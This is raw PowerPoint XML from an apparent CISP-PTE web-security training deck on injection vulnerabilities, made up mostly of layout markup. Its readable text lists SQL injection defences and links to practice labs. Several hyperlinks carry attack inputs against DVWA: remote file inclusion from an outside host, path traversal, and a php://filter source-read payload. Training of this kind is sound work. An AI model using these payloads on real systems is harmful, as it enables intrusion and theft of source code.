              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>接收数据后对参数值进行审核／过滤</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入分析器／使用第三方应用来构造</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用最小化权限来访问数据库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>禁止数据库直接运行系统命令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>禁止发送带有含义的错误页面到用户界面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>统一管理错误界面</a:t>
            </a:r>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13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="551152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lvl1pPr algn="ctr">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5895732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9756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800523" y="274639"/>
            <a:ext cx="781877"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9902891"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="直接连接符 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10704512" y="274639"/>
            <a:ext cx="0" cy="5851525"/>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25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lvl1pPr algn="ctr">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3822199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lvl1pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-28575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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="直接连接符 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="直接连接符 5"/>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812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ctr">
              <a:defRPr sz="4000" b="1" cap="all"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1302411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sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="994892"/>
            <a:ext cx="5384800" cy="5131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half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6197600" y="994890"/>
            <a:ext cx="5384800" cy="51312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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直接连接符 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="直接连接符 7"/>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49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980728"/>
            <a:ext cx="5386917"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1836515"/>
            <a:ext cx="5386917" cy="4289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文本占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6193368" y="980728"/>
            <a:ext cx="53890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1836515"/>
            <a:ext cx="5389033" cy="4289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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="直接连接符 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直接连接符 9"/>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16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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="直接连接符 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="直接连接符 5"/>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08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951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ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="1" u="none"/>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4766733" y="273051"/>
            <a:ext cx="6815667" cy="585311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dirty="0"/>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03312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lvl1pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-28575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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="直接连接符 5"/>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337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ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="2000" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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将图片拖动到占位符，或单击添加图标</a:t>
            </a:r>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424503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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="688069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800523" y="274639"/>
            <a:ext cx="781877"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9902891" cy="5851525"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="直接连接符 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10704512" y="274639"/>
            <a:ext cx="0" cy="5851525"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="直接连接符 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10704512" y="274639"/>
            <a:ext cx="0" cy="5851525"/>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20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ctr">
              <a:defRPr sz="4000" b="1" cap="all"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3355885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sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="994892"/>
            <a:ext cx="5384800" cy="5131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994890"/>
            <a:ext cx="5384800" cy="51312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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直接连接符 7"/>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9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980728"/>
            <a:ext cx="5386917"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1836515"/>
            <a:ext cx="5386917" cy="4289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980728"/>
            <a:ext cx="53890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1836515"/>
            <a:ext cx="5389033" cy="4289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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="直接连接符 9"/>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468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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="直接连接符 5"/>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268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8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ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="1" u="none"/>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4766733" y="273051"/>
            <a:ext cx="6815667" cy="585311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70869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ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="2000" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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6895294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2800" cy="49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7" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="980729"/>
            <a:ext cx="10972800" cy="514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pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 11" descr="E:\公司素材\公司LOGO\白色透明LOGO.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43933" y="6381751"/>
            <a:ext cx="127154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userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8976321" y="6571954"/>
            <a:ext cx="3202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hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>© 2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>谷安天下版权所有</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7344139" y="6571953"/>
            <a:ext cx="1531188" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B395237E-8500-4FE0-A669-5FCAC893D89F}" type="datetime8">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10/3/17 11:42 AM</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364592" y="6571832"/>
            <a:ext cx="638316" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:fld id="{37E5D1F4-5835-4861-BEE9-F37CD80E098F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>页</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="11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par>
    </p:tnLst>
  </p:timing>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200" u="none" kern="120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2800" cy="49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7" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="980729"/>
            <a:ext cx="10972800" cy="514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pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 11" descr="E:\公司素材\公司LOGO\白色透明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3933" y="6381751"/>
            <a:ext cx="127154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p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8976321" y="6571954"/>
            <a:ext cx="3202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hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>© 2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>谷安天下版权所有</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7344139" y="6571953"/>
            <a:ext cx="1531188" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B395237E-8500-4FE0-A669-5FCAC893D89F}" type="datetime8">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10/3/17 11:42 AM</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364592" y="6571832"/>
            <a:ext cx="638316" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:fld id="{37E5D1F4-5835-4861-BEE9-F37CD80E098F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>页</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 11" descr="E:\公司素材\公司LOGO\白色透明LOGO.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43933" y="6381751"/>
            <a:ext cx="127154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p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8976321" y="6571954"/>
            <a:ext cx="3202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hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>© 2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>谷安天下版权所有</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7344139" y="6571953"/>
            <a:ext cx="1531188" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B395237E-8500-4FE0-A669-5FCAC893D89F}" type="datetime8">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10/3/17 11:42 AM</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364592" y="6571832"/>
            <a:ext cx="638316" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:fld id="{37E5D1F4-5835-4861-BEE9-F37CD80E098F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>页</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38646830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par>
    </p:tnLst>
  </p:timing>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200" u="none" kern="120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http://mcir.pte.com/sqlol/challenges/challenge0.ph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mcir.pte.com/sqlol/challenges/challenge1.ph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mcir.pte.com/sqlol/challenges/challenge1.ph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mcir.pte.com/sqlol/challenges/challenge1.ph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mcir.pte.com/sqlol/challenges/challenge1.php"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mcir.pte.com/sqlol/challenges/challenge1.php"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mcir.pte.com/sqlol/challenges/challenge1.php"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mcir.pte.com/sqlol/challenges/challenge1.ph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mcir.pte.com/sqlol/challenges/challenge1.php"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mcir.pte.com/sqlol/challenges/challenge1.php"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mcir.pte.com/sqlol/challenges/challenge1.php"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hacmebank.com/HacmeBank_v2_Website/aspx/Login.aspx?function=Welcom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hacmebank.com/HacmeBank_v2_Website/aspx/Login.aspx?function=Welcome"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http://192.168.1.64/dvwa/vulnerabilities/fi/?page=file1.php" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mydvwa.com/dvwa/vulnerabilities/fi/?page=http://site1.com/a.php" TargetMode="External"/><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http://mydvwa.com/dvwa/vulnerabilities/fi/?page=../../../a.jpg" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mydvwa.com/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=../../../a.php" TargetMode="External"/><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hyperlink" Target="http://mydvwa.com/dvwa/vulnerabilities/exec/"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Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2711451" y="3728369"/>
            <a:ext cx="6804025" cy="1932879"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>CISP-PTE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t> 安全基础</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="64C100"/>
                </a:solidFill>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="64C100"/>
              </a:solidFill>
              <a:cs typeface="Adobe 黑体 Std R"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13315" name="Picture 4" descr="E:\公司素材\公司LOGO\透明.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36" y="95251"/>
            <a:ext cx="16510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18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8185026" y="5877272"/>
            <a:ext cx="2303463"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marL="12700" indent="-12700" defTabSz="957263" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="957263" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
